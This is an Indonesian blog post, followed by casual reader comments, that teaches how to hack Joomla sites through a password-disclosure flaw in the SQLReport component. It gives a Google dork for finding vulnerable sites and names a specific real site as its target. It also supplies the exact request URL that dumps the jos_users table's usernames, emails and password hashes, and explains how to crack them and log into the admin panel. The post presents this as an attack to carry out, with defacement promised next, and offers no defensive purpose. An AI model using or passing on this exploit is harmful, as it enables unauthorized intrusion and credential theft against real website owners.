Berikut Tutorial Hacking Joomla dengan SQLReport Password Disclosure:
1. Ketikkan Dork ini di Google:" inurl:com_sqlreport" (tanpa tanda kutip):
2. Pilih Target.
Disini saya memilih http://www.parksepa.werro.ee/administrator/components/com_sqlreport....user_id=0
Masukkan exploit: /administrator/components/com_sqlreport/ajax/cvs.php?table=jos_users&fields=username%7Cemail%7Cpassword&filters=&username=&user_id=0 (biar lebih jelas klik aja gambarnya)
3. setelah itu browser akan mendownload sebuah file yang berisi username, email, dan password, buka file tersebut
kemudian akan terlihat Username, Email, dan Password dari website yang akan kita Hack:
4. Jika password berhasil didecrypt kita bisa langsung login ke panel admin, namun jika password tidak berhasil di decrypt, silahkan cari target yang lain.
Biasanya, halaman login admin joomla adalah http://[url situs]/administrator/
jadi, halaman login untuk situs yang saya akan hack adalah: http://www.parksepa.werro.ee/administrator/
Jika sudah masuk halaman login admin, silahkan masukkan username dan passwordnya:
5. Taaaraa!!! sekarang temen-temen udah bisa masuk ke website yang temen-temen hack :)
Untuk cara deface tampilan web-nya akan saya bahas di postingan berikutnya :)
mampir sejenak untuk baca artikel ini..
BalasHapusheheh, thx udah berkunjung mas :)
BalasHapusGan Link saya yang Share4rt Namanya diubah menjadi " Share4rt Berbagi " thanks :)
BalasHapus#SALAM SHARE4RT
okay, biar ane perbaiki dulu :)
BalasHapusoke, ditunggu aja sob :)
BalasHapusBlogwalking hari minggu sob
BalasHapusSalam Sehat Sesama Anggota Grup Republik Blogger Nusantara #Admin(Eko Budi Santoso)